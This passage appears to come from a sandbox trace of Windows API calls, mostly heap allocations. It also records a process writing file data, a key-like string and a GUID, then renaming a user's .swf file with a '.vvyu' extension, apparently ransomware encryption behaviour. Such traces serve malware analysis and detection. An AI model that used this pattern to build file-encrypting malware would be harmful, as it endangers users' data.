(HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0195.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a210 [0195.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0195.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a270 [0195.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0195.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0195.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0195.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a288 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a228 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1f8 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0196.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0196.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0196.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0196.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0196.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0196.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0196.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0196.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cce0 | out: hHeap=0x6a0000) returned 1 [0196.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.014] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0xe585, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0xe585, lpOverlapped=0x0) returned 1 [0196.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0196.015] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xe58a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.015] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0196.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.017] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.018] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.018] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.018] CloseHandle (hObject=0x52c) returned 1 [0196.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0196.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d2dc80 [0196.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0196.020] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\zwQUu_BYs.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\zwquu_bys.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\zwQUu_BYs.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\zwquu_bys.swf.vvyu")) returned 1 [0196.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.023] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0196.026] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f60100, ftCreationTime.dwHighDateTime=0x1d8a552, ftLastAccessTime.dwLowDateTime=0x88003590, ftLastAccessTime.dwHighDateTime=0x1d8a735, ftLastWriteTime.dwLowDateTime=0x88003590, ftLastWriteTime.dwHighDateTime=0x1d8a735, nFileSizeHigh=0x0, nFileSizeLow=0xe58a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zwQUu_BYs.swf", cAlternateFileName="ZWQUU_~1.SWF")) returned 0 [0196.026] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0196.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47790 | out: hHeap=0x6a0000) returned 1 [0196.027] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0196.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0196.027] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0196.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.046] HeapFree (in: 